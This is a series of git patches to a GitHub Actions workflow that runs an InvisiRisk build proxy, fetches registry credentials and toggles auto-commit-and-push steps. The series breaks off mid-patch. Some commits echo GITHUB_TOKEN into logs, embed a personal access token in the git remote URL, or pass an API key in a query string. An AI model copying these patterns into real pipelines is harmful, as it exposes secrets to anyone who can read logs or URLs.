From 69cb3f325ce58cead43d9185742b92e41fb44718 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Fri, 24 Jan 2025 15:46:30 +0545 Subject: [PATCH 01/89] Update main.yml --- .github/workflows/main.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index 9d57c51..e16f441 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -59,7 +59,7 @@ jobs: needs: [create_scan_in_IR_Portal, ecr_details] services: pse: - image: 282904853176.dkr.ecr.us-west-2.amazonaws.com/invisirisk/pse-proxy:dev-test + image: 282904853176.dkr.ecr.us-west-2.amazonaws.com/invisirisk/pse-proxy:latest credentials: username: ${{needs.ecr_details.outputs.ecr_username}} password: ${{needs.ecr_details.outputs.ecr_token}} From e420bdad99b0a701955a05c08ec710cba6168854 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Fri, 24 Jan 2025 15:47:58 +0545 Subject: [PATCH 02/89] Update main.yml From e728fea3385459022ceb9454a55132c02a04b789 Mon Sep 17 00:00:00 2001 From: ir-ashraya-tuladhar Date: Fri, 24 Jan 2025 18:38:47 +0545 Subject: [PATCH 03/89] Update package.json --- package.json | 29 +++++++++++++++-------------- 1 file changed, 15 insertions(+), 14 deletions(-) diff --git a/package.json b/package.json index 9507c1b..e833609 100644 --- a/package.json +++ b/package.json @@ -1,23 +1,24 @@ { - "name": "GeeksForGeeks", + "name": "test-js-repo", "version": "1.0.0", - "description": "GeeksForGeeks", + "description": "This is test Javascript repo", "main": "index.js", "scripts": { - "test": "echo \"test started \"", - "start": "node start.js" + "test": "echo \"Test is successful \" && exit 0" }, - "engines": { - "node": ">=7.6.0", - "npm": ">=4.1.2" + "repository": { + "type": "git", + "url": "git+https://github.com/ashokkasti/test-js-repo.git" }, - "author": "GeeksForGeeks", - "license": "ISC", + "author": "Ashok Kasti", + "license": "MIT", + "bugs": { + "url": "https://github.com/ashokkasti/test-js-repo/issues" + }, + "homepage": "https://github.com/ashokkasti/test-js-repo#readme", "dependencies": { - "body-parser": "^1.17.1", - "express": "^4.15.2", - "express-validator": "^3.1.2", - "mongoose": "^4.8.7", - "nodemon": "^1.14.12" + "array-first": "^1.0.2", + "array-last": "^1.3.0", + "is-sorted": "^1.0.5" } } From 0ffa9c1e770279bbe55a12ad871313d3fcdfe071 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Mon, 27 Jan 2025 15:28:34 +0545 Subject: [PATCH 04/89] Update main.yml --- .github/workflows/main.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index e16f441..cde457d 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -11,7 +11,7 @@ permissions: contents: read packages: read env: - API_URL: https://app.audit.dev.invisirisk.com + API_URL: https://app.stage.invisirisk.com jobs: create_scan_in_IR_Portal: @@ -67,7 +67,7 @@ jobs: PSE_DEBUG_FLAG: --alsologtostderr POLICY_LOG: t INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY}} - INVISIRISK_PORTAL: https://app.audit.dev.invisirisk.com/ + INVISIRISK_PORTAL: https://app.stage.invisirisk.com/ GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} container: image: node:18-alpine From 90a260b013a9258723d5324ab8b91c7673389d2d Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Mon, 27 Jan 2025 15:55:59 +0545 Subject: [PATCH 05/89] Update main.yml --- .github/workflows/main.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index cde457d..909e971 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -90,6 +90,7 @@ jobs: with: node-version: ${{ matrix.node-version }} - run: npm install + - run: git push - run: npm ci - run: npm run build --if-present - run: npm test From bf71648c1ac5377d9e2400ab60b7b4fc1089b39f Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Mon, 27 Jan 2025 17:14:04 +0545 Subject: [PATCH 06/89] Update main.yml --- .github/workflows/main.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index 909e971..cba3599 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -11,7 +11,7 @@ permissions: contents: read packages: read env: - API_URL: https://app.stage.invisirisk.com + API_URL: https://app.invisirisk.com jobs: create_scan_in_IR_Portal: @@ -67,7 +67,7 @@ jobs: PSE_DEBUG_FLAG: --alsologtostderr POLICY_LOG: t INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY}} - INVISIRISK_PORTAL: https://app.stage.invisirisk.com/ + INVISIRISK_PORTAL: https://app.invisirisk.com/ GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} container: image: node:18-alpine From 538394c623bfd834d7234d3a031058d2ccd2ad56 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Mon, 27 Jan 2025 17:26:24 +0545 Subject: [PATCH 07/89] Update main.yml From ed88bdd27d38f1d6dbdaaf6b2b90627f050ff047 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Mon, 27 Jan 2025 17:31:26 +0545 Subject: [PATCH 08/89] Update main.yml --- .github/workflows/main.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index cba3599..ac3b32f 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -90,7 +90,7 @@ jobs: with: node-version: ${{ matrix.node-version }} - run: npm install - - run: git push + # - run: git push - run: npm ci - run: npm run build --if-present - run: npm test From c4272098d5453f2a490ecab6332e3ef27baebfce Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 28 Jan 2025 11:31:23 +0545 Subject: [PATCH 09/89] Update main.yml --- .github/workflows/main.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index ac3b32f..909e971 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -11,7 +11,7 @@ permissions: contents: read packages: read env: - API_URL: https://app.invisirisk.com + API_URL: https://app.stage.invisirisk.com jobs: create_scan_in_IR_Portal: @@ -67,7 +67,7 @@ jobs: PSE_DEBUG_FLAG: --alsologtostderr POLICY_LOG: t INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY}} - INVISIRISK_PORTAL: https://app.invisirisk.com/ + INVISIRISK_PORTAL: https://app.stage.invisirisk.com/ GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} container: image: node:18-alpine @@ -90,7 +90,7 @@ jobs: with: node-version: ${{ matrix.node-version }} - run: npm install - # - run: git push + - run: git push - run: npm ci - run: npm run build --if-present - run: npm test From 84bd37fd228ed121bff17e6e89210ee47a58ff46 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 28 Jan 2025 11:33:04 +0545 Subject: [PATCH 10/89] Update main.ym From bd3e80d91beb922c4882643263404356a6635c1c Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 28 Jan 2025 11:38:41 +0545 Subject: [PATCH 11/89] Update main.yml --- .github/workflows/main.yml | 36 ++++++++++++++++++++++++++++++------ 1 file changed, 30 insertions(+), 6 deletions(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index 909e971..f9c50fa 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -1,18 +1,15 @@ - name: Build NPM Package on: push: branches: [ main ] pull_request: branches: [ main ] - permissions: checks: write - contents: read + contents: write packages: read env: API_URL: https://app.stage.invisirisk.com - jobs: create_scan_in_IR_Portal: runs-on: ubuntu-latest @@ -85,13 +82,40 @@ jobs: SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} - name: Checkout the code uses: actions/checkout@v3 + with: + fetch-depth: 0 + token: ${{ secrets.GITHUB_TOKEN }} + - name: Setup Git Safe Directory + run: | + git config --global --add safe.directory /__w/GithubwithProxyJavaScript/GithubwithProxyJavaScript + - name: Configure Git + run: | + git config --global user.name "github-actions[bot]" + git config --global user.email "github-actions[bot]@users.noreply.github.com" + git config --global core.protectNTFS false - name: Use Node.js ${{ matrix.node-version }} uses: actions/setup-node@v3 with: node-version: ${{ matrix.node-version }} - run: npm install - - run: git push + - name: Commit and Push Changes + run: | + # Ensure we're in the right directory + cd /__w/GithubwithProxyJavaScript/GithubwithProxyJavaScript + + # Configure Git authentication + git remote set-url origin https://x-access-token:${GITHUB_TOKEN}@github.com/${GITHUB_REPOSITORY}.git + + # Add and commit changes if any exist + git add . + if git diff --cached --quiet; then + echo "No changes to commit" + else + git commit -m "chore: update build artifacts [skip ci]" + git push origin HEAD:${GITHUB_REF#refs/heads/} + fi + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - run: npm ci - run: npm run build --if-present - run: npm test - From c9ee150ebe116c5d73ba698cd2e2da4ee5080548 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 28 Jan 2025 11:40:00 +0545 Subject: [PATCH 12/89] Update main.yml --- .github/workflows/main.yml | 34 ++++------------------------------ 1 file changed, 4 insertions(+), 30 deletions(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index f9c50fa..15181a3 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -4,12 +4,14 @@ on: branches: [ main ] pull_request: branches: [ main ] + permissions: checks: write - contents: write + contents: read packages: read env: API_URL: https://app.stage.invisirisk.com + jobs: create_scan_in_IR_Portal: runs-on: ubuntu-latest @@ -82,40 +84,12 @@ jobs: SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} - name: Checkout the code uses: actions/checkout@v3 - with: - fetch-depth: 0 - token: ${{ secrets.GITHUB_TOKEN }} - - name: Setup Git Safe Directory - run: | - git config --global --add safe.directory /__w/GithubwithProxyJavaScript/GithubwithProxyJavaScript - - name: Configure Git - run: | - git config --global user.name "github-actions[bot]" - git config --global user.email "github-actions[bot]@users.noreply.github.com" - git config --global core.protectNTFS false - name: Use Node.js ${{ matrix.node-version }} uses: actions/setup-node@v3 with: node-version: ${{ matrix.node-version }} - run: npm install - - name: Commit and Push Changes - run: | - # Ensure we're in the right directory - cd /__w/GithubwithProxyJavaScript/GithubwithProxyJavaScript - - # Configure Git authentication - git remote set-url origin https://x-access-token:${GITHUB_TOKEN}@github.com/${GITHUB_REPOSITORY}.git - - # Add and commit changes if any exist - git add . - if git diff --cached --quiet; then - echo "No changes to commit" - else - git commit -m "chore: update build artifacts [skip ci]" - git push origin HEAD:${GITHUB_REF#refs/heads/} - fi - env: - GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + - run: git push - run: npm ci - run: npm run build --if-present - run: npm test From b22fcac06f7d142ce5cec7a3534ada89bd6ec2cd Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Wed, 29 Jan 2025 14:30:32 +0545 Subject: [PATCH 13/89] Update main.yml --- .github/workflows/main.yml | 59 ++++++++++++++++++++++++-------------- 1 file changed, 37 insertions(+), 22 deletions(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index 15181a3..6c039d4 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -1,17 +1,19 @@ name: Build NPM Package + on: push: branches: [ main ] pull_request: branches: [ main ] - + permissions: checks: write - contents: read + contents: write # Add write permission for contents packages: read + env: API_URL: https://app.stage.invisirisk.com - + jobs: create_scan_in_IR_Portal: runs-on: ubuntu-latest @@ -28,6 +30,7 @@ jobs: - name: Parse Response id: parseResponse run: echo "scan_id=${{fromJSON(steps.createScan.outputs.response).data.scan_id}}" >> "$GITHUB_OUTPUT" + ecr_details: runs-on: ubuntu-latest outputs: @@ -40,8 +43,8 @@ jobs: id: fetchECRDetails uses: fjogeleit/http-request-action@v1.15.1 with: - url: '${{env.API_URL}}/utilityapi/v1/registry?api_key=${{secrets.VB_API_KEY}}' - method: 'GET' + url: '${{env.API_URL}}/utilityapi/v1/registry?api_key=${{secrets.VB_API_KEY}}' + method: 'GET' - name: Decoding VB Token id: parseToken run: echo "DECODED_TOKEN=$(echo ${{ fromJson(steps.fetchECRDetails.outputs.response).data }} | base64 -d)" >> "$GITHUB_OUTPUT" @@ -52,7 +55,7 @@ jobs: echo "token=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).password}}" >> "$GITHUB_OUTPUT" echo "region=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).region}}" >> "$GITHUB_OUTPUT" echo "registry_id=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).registry_id}}" >> "$GITHUB_OUTPUT" - + start_proxy_and_build: runs-on: ubuntu-latest needs: [create_scan_in_IR_Portal, ecr_details] @@ -75,21 +78,33 @@ jobs: matrix: node-version: [18.x] steps: - - env: - SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} - run: echo $SCAN_ID - - uses: invisirisk/pse-action@v1.0.8 - with: + - env: + SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} + run: echo $SCAN_ID + - uses: invisirisk/pse-action@v1.0.8 + with: github-token: ${{ secrets.GITHUB_TOKEN }} SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} - - name: Checkout the code - uses: actions/checkout@v3 - - name: Use Node.js ${{ matrix.node-version }} - uses: actions/setup-node@v3 - with: - node-version: ${{ matrix.node-version }} - - run: npm install - - run: git push - - run: npm ci - - run: npm run build --if-present - - run: npm test + - name: Checkout the code + uses: actions/checkout@v3 + with: + token: ${{ secrets.GITHUB_PAT }} # Use PAT for authentication + - name: Use Node.js ${{ matrix.node-version }} + uses: actions/setup-node@v3 + with: + node-version: ${{ matrix.node-version }} + - run: npm install + - run: npm ci + - run: npm run build --if-present + - run: npm test + - name: Configure Git + run: | + git config --global user.name "github-actions[bot]" + git config --global user.email "github-actions[bot]@users.noreply.github.com" + - name: Commit and Push Changes + run: | + git add . + git commit -m "Automated build and test updates" + git push origin main + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_PAT }} # Use PAT for authentication From 94fac6afedffb713b2387fa6bfdb4e34a90c3f47 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Wed, 29 Jan 2025 14:41:22 +0545 Subject: [PATCH 14/89] Update main.yml --- .github/workflows/main.yml | 22 ++++++++++------------ 1 file changed, 10 insertions(+), 12 deletions(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index 6c039d4..51478eb 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -8,7 +8,7 @@ on: permissions: checks: write - contents: write # Add write permission for contents + contents: write packages: read env: @@ -78,17 +78,19 @@ jobs: matrix: node-version: [18.x] steps: - - env: - SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} - run: echo $SCAN_ID + - name: Debug Environment Variables + run: | + echo "SCAN_ID: $SCAN_ID" + echo "API_URL: $API_URL" + echo "GITHUB_TOKEN: $GITHUB_TOKEN" - uses: invisirisk/pse-action@v1.0.8 - with: - github-token: ${{ secrets.GITHUB_TOKEN }} + env: SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - name: Checkout the code uses: actions/checkout@v3 with: - token: ${{ secrets.GITHUB_PAT }} # Use PAT for authentication + token: ${{ secrets.GITHUB_PAT }} # Or use ${{ secrets.GITHUB_TOKEN }} - name: Use Node.js ${{ matrix.node-version }} uses: actions/setup-node@v3 with: @@ -97,14 +99,10 @@ jobs: - run: npm ci - run: npm run build --if-present - run: npm test - - name: Configure Git - run: | - git config --global user.name "github-actions[bot]" - git config --global user.email "github-actions[bot]@users.noreply.github.com" - name: Commit and Push Changes run: | git add . git commit -m "Automated build and test updates" git push origin main env: - GITHUB_TOKEN: ${{ secrets.GITHUB_PAT }} # Use PAT for authentication + GITHUB_TOKEN: ${{ secrets.GITHUB_PAT }} # Or use ${{ secrets.GITHUB_TOKEN }} From 782e02f2f69050b448d7beb34bc02d02bec4b7ff Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Wed, 29 Jan 2025 14:55:08 +0545 Subject: [PATCH 15/89] Update main.yml --- .github/workflows/main.yml | 59 +++++++++++++++----------------------- 1 file changed, 23 insertions(+), 36 deletions(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index 51478eb..15181a3 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -1,19 +1,17 @@ name: Build NPM Package - on: push: branches: [ main ] pull_request: branches: [ main ] - + permissions: checks: write - contents: write + contents: read packages: read - env: API_URL: https://app.stage.invisirisk.com - + jobs: create_scan_in_IR_Portal: runs-on: ubuntu-latest @@ -30,7 +28,6 @@ jobs: - name: Parse Response id: parseResponse run: echo "scan_id=${{fromJSON(steps.createScan.outputs.response).data.scan_id}}" >> "$GITHUB_OUTPUT" - ecr_details: runs-on: ubuntu-latest outputs: @@ -43,8 +40,8 @@ jobs: id: fetchECRDetails uses: fjogeleit/http-request-action@v1.15.1 with: - url: '${{env.API_URL}}/utilityapi/v1/registry?api_key=${{secrets.VB_API_KEY}}' - method: 'GET' + url: '${{env.API_URL}}/utilityapi/v1/registry?api_key=${{secrets.VB_API_KEY}}' + method: 'GET' - name: Decoding VB Token id: parseToken run: echo "DECODED_TOKEN=$(echo ${{ fromJson(steps.fetchECRDetails.outputs.response).data }} | base64 -d)" >> "$GITHUB_OUTPUT" @@ -55,7 +52,7 @@ jobs: echo "token=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).password}}" >> "$GITHUB_OUTPUT" echo "region=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).region}}" >> "$GITHUB_OUTPUT" echo "registry_id=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).registry_id}}" >> "$GITHUB_OUTPUT" - + start_proxy_and_build: runs-on: ubuntu-latest needs: [create_scan_in_IR_Portal, ecr_details] @@ -78,31 +75,21 @@ jobs: matrix: node-version: [18.x] steps: - - name: Debug Environment Variables - run: | - echo "SCAN_ID: $SCAN_ID" - echo "API_URL: $API_URL" - echo "GITHUB_TOKEN: $GITHUB_TOKEN" - - uses: invisirisk/pse-action@v1.0.8 - env: + - env: + SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} + run: echo $SCAN_ID + - uses: invisirisk/pse-action@v1.0.8 + with: + github-token: ${{ secrets.GITHUB_TOKEN }} SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} - GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - - name: Checkout the code - uses: actions/checkout@v3 - with: - token: ${{ secrets.GITHUB_PAT }} # Or use ${{ secrets.GITHUB_TOKEN }} - - name: Use Node.js ${{ matrix.node-version }} - uses: actions/setup-node@v3 - with: - node-version: ${{ matrix.node-version }} - - run: npm install - - run: npm ci - - run: npm run build --if-present - - run: npm test - - name: Commit and Push Changes - run: | - git add . - git commit -m "Automated build and test updates" - git push origin main - env: - GITHUB_TOKEN: ${{ secrets.GITHUB_PAT }} # Or use ${{ secrets.GITHUB_TOKEN }} + - name: Checkout the code + uses: actions/checkout@v3 + - name: Use Node.js ${{ matrix.node-version }} + uses: actions/setup-node@v3 + with: + node-version: ${{ matrix.node-version }} + - run: npm install + - run: git push + - run: npm ci + - run: npm run build --if-present + - run: npm test From 0c525811c526e62f82e6b4ac668b460dc031cce3 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Wed, 29 Jan 2025 15:05:12 +0545 Subject: [PATCH 16/89] Update main.yml --- .github/workflows/main.yml | 58 ++++++++++++++++++++------------------ 1 file changed, 31 insertions(+), 27 deletions(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index 15181a3..44ed2ad 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -1,17 +1,19 @@ name: Build NPM Package + on: push: branches: [ main ] pull_request: branches: [ main ] - + permissions: checks: write contents: read packages: read + env: API_URL: https://app.stage.invisirisk.com - + jobs: create_scan_in_IR_Portal: runs-on: ubuntu-latest @@ -28,6 +30,7 @@ jobs: - name: Parse Response id: parseResponse run: echo "scan_id=${{fromJSON(steps.createScan.outputs.response).data.scan_id}}" >> "$GITHUB_OUTPUT" + ecr_details: runs-on: ubuntu-latest outputs: @@ -40,8 +43,8 @@ jobs: id: fetchECRDetails uses: fjogeleit/http-request-action@v1.15.1 with: - url: '${{env.API_URL}}/utilityapi/v1/registry?api_key=${{secrets.VB_API_KEY}}' - method: 'GET' + url: '${{env.API_URL}}/utilityapi/v1/registry?api_key=${{secrets.VB_API_KEY}}' + method: 'GET' - name: Decoding VB Token id: parseToken run: echo "DECODED_TOKEN=$(echo ${{ fromJson(steps.fetchECRDetails.outputs.response).data }} | base64 -d)" >> "$GITHUB_OUTPUT" @@ -52,7 +55,7 @@ jobs: echo "token=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).password}}" >> "$GITHUB_OUTPUT" echo "region=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).region}}" >> "$GITHUB_OUTPUT" echo "registry_id=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).registry_id}}" >> "$GITHUB_OUTPUT" - + start_proxy_and_build: runs-on: ubuntu-latest needs: [create_scan_in_IR_Portal, ecr_details] @@ -62,12 +65,12 @@ jobs: credentials: username: ${{needs.ecr_details.outputs.ecr_username}} password: ${{needs.ecr_details.outputs.ecr_token}} - env: - PSE_DEBUG_FLAG: --alsologtostderr - POLICY_LOG: t - INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY}} - INVISIRISK_PORTAL: https://app.stage.invisirisk.com/ - GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + env: + PSE_DEBUG_FLAG: --alsologtostderr + POLICY_LOG: t + INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY}} + INVISIRISK_PORTAL: https://app.stage.invisirisk.com/ + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} container: image: node:18-alpine options: --cap-add=NET_ADMIN @@ -75,21 +78,22 @@ jobs: matrix: node-version: [18.x] steps: - - env: - SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} - run: echo $SCAN_ID - - uses: invisirisk/pse-action@v1.0.8 - with: + - env: + SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} + run: echo $SCAN_ID + - uses: invisirisk/pse-action@v1.0.8 + with: github-token: ${{ secrets.GITHUB_TOKEN }} SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} - - name: Checkout the code - uses: actions/checkout@v3 - - name: Use Node.js ${{ matrix.node-version }} - uses: actions/setup-node@v3 - with: - node-version: ${{ matrix.node-version }} - - run: npm install - - run: git push - - run: npm ci - - run: npm run build --if-present - - run: npm test + - name: Checkout the code + uses: actions/checkout@v3 + - name: Configure Git + run: git config --global --add safe.directory "${GITHUB_WORKSPACE}" + - name: Use Node.js ${{ matrix.node-version }} + uses: actions/setup-node@v3 + with: + node-version: ${{ matrix.node-version }} + - run: npm install + - run: npm ci + - run: npm run build --if-present + - run: npm test From 1c491a4134a8f685f0832865d789de88e602c09f Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Wed, 29 Jan 2025 15:08:32 +0545 Subject: [PATCH 17/89] Update main.yml --- .github/workflows/main.yml | 57 +++++++++++++++++--------------------- 1 file changed, 26 insertions(+), 31 deletions(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index 44ed2ad..b9feea1 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -1,19 +1,17 @@ name: Build NPM Package - on: push: branches: [ main ] pull_request: branches: [ main ] - + permissions: checks: write contents: read packages: read - env: API_URL: https://app.stage.invisirisk.com - + jobs: create_scan_in_IR_Portal: runs-on: ubuntu-latest @@ -30,7 +28,6 @@ jobs: - name: Parse Response id: parseResponse run: echo "scan_id=${{fromJSON(steps.createScan.outputs.response).data.scan_id}}" >> "$GITHUB_OUTPUT" - ecr_details: runs-on: ubuntu-latest outputs: @@ -43,8 +40,8 @@ jobs: id: fetchECRDetails uses: fjogeleit/http-request-action@v1.15.1 with: - url: '${{env.API_URL}}/utilityapi/v1/registry?api_key=${{secrets.VB_API_KEY}}' - method: 'GET' + url: '${{env.API_URL}}/utilityapi/v1/registry?api_key=${{secrets.VB_API_KEY}}' + method: 'GET' - name: Decoding VB Token id: parseToken run: echo "DECODED_TOKEN=$(echo ${{ fromJson(steps.fetchECRDetails.outputs.response).data }} | base64 -d)" >> "$GITHUB_OUTPUT" @@ -55,7 +52,6 @@ jobs: echo "token=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).password}}" >> "$GITHUB_OUTPUT" echo "region=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).region}}" >> "$GITHUB_OUTPUT" echo "registry_id=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).registry_id}}" >> "$GITHUB_OUTPUT" - start_proxy_and_build: runs-on: ubuntu-latest needs: [create_scan_in_IR_Portal, ecr_details] @@ -65,12 +61,12 @@ jobs: credentials: username: ${{needs.ecr_details.outputs.ecr_username}} password: ${{needs.ecr_details.outputs.ecr_token}} - env: - PSE_DEBUG_FLAG: --alsologtostderr - POLICY_LOG: t - INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY}} - INVISIRISK_PORTAL: https://app.stage.invisirisk.com/ - GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + env: + PSE_DEBUG_FLAG: --alsologtostderr + POLICY_LOG: t + INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY}} + INVISIRISK_PORTAL: https://app.stage.invisirisk.com/ + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} container: image: node:18-alpine options: --cap-add=NET_ADMIN @@ -78,22 +74,21 @@ jobs: matrix: node-version: [18.x] steps: - - env: - SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} - run: echo $SCAN_ID - - uses: invisirisk/pse-action@v1.0.8 - with: + - env: + SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} + run: echo $SCAN_ID + - uses: invisirisk/pse-action@v1.0.8 + with: github-token: ${{ secrets.GITHUB_TOKEN }} SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} - - name: Checkout the code - uses: actions/checkout@v3 - - name: Configure Git - run: git config --global --add safe.directory "${GITHUB_WORKSPACE}" - - name: Use Node.js ${{ matrix.node-version }} - uses: actions/setup-node@v3 - with: - node-version: ${{ matrix.node-version }} - - run: npm install - - run: npm ci - - run: npm run build --if-present - - run: npm test + - name: Checkout the code + uses: actions/checkout@v3 + - name: Use Node.js ${{ matrix.node-version }} + uses: actions/setup-node@v3 + with: + node-version: ${{ matrix.node-version }} + - run: npm install + # - run: git push + - run: npm ci + - run: npm run build --if-present + - run: npm test From 5d4edc0b0284a2a06cba67b13ef8b6ace99b148d Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Wed, 29 Jan 2025 15:16:24 +0545 Subject: [PATCH 18/89] Update main.yml --- .github/workflows/main.yml | 30 ++++++++++++++++++++++++++---- 1 file changed, 26 insertions(+), 4 deletions(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index b9feea1..51b6ccd 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -4,14 +4,15 @@ on: branches: [ main ] pull_request: branches: [ main ] - + permissions: checks: write - contents: read + contents: write # Ensure contents: write permission for pushing packages: read + env: API_URL: https://app.stage.invisirisk.com - + jobs: create_scan_in_IR_Portal: runs-on: ubuntu-latest @@ -28,6 +29,7 @@ jobs: - name: Parse Response id: parseResponse run: echo "scan_id=${{fromJSON(steps.createScan.outputs.response).data.scan_id}}" >> "$GITHUB_OUTPUT" + ecr_details: runs-on: ubuntu-latest outputs: @@ -52,6 +54,7 @@ jobs: echo "token=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).password}}" >> "$GITHUB_OUTPUT" echo "region=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).region}}" >> "$GITHUB_OUTPUT" echo "registry_id=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).registry_id}}" >> "$GITHUB_OUTPUT" + start_proxy_and_build: runs-on: ubuntu-latest needs: [create_scan_in_IR_Portal, ecr_details] @@ -83,12 +86,31 @@ jobs: SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} - name: Checkout the code uses: actions/checkout@v3 + with: + token: ${{ secrets.PAT }} # Use PAT for checkout - name: Use Node.js ${{ matrix.node-version }} uses: actions/setup-node@v3 with: node-version: ${{ matrix.node-version }} - run: npm install - # - run: git push - run: npm ci - run: npm run build --if-present - run: npm test + + # Configure Git + - name: Configure Git + run: | + git config --global user.name "GitHub Actions" + git config --global user.email "actions@github.com" + + # Add and commit changes + - name: Commit changes + run: | + git add . + git commit -m "Automated build and test changes" + + # Push changes + - name: Push changes + run: | + git remote set-url origin https://${{ secrets.PAT }}@github.com/${{ github.repository }}.git + git push origin main From 3bf809e1465cef63274f6d8d2e9340f3fd40915f Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Wed, 29 Jan 2025 15:34:02 +0545 Subject: [PATCH 19/89] Update main.yml --- .github/workflows/main.yml | 93 +++++++++++++++++++++----------------- 1 file changed, 52 insertions(+), 41 deletions(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index 51b6ccd..f925632 100644 --- 